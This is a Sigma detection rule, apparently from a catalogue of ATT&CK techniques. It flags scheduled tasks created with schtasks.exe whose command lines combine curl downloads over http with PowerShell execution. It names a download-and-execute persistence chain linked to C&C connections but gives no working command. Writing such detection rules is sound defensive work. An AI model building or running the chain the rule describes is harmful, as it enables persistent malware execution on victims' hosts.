Techniques
Sample rules
Scheduled Task Creation with Curl and PowerShell Execution Combo
- source: sigma
- technicques:
- t1053
- t1053.005
- t1105
- t1218
Description
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
Detection logic
condition: all of selection_*
selection_curl:
CommandLine|contains|all:
- 'curl '
- http
- -o
selection_img:
CommandLine|contains|windash: ' /create '
Image|endswith: \schtasks.exe
selection_powershell:
CommandLine|contains: powershell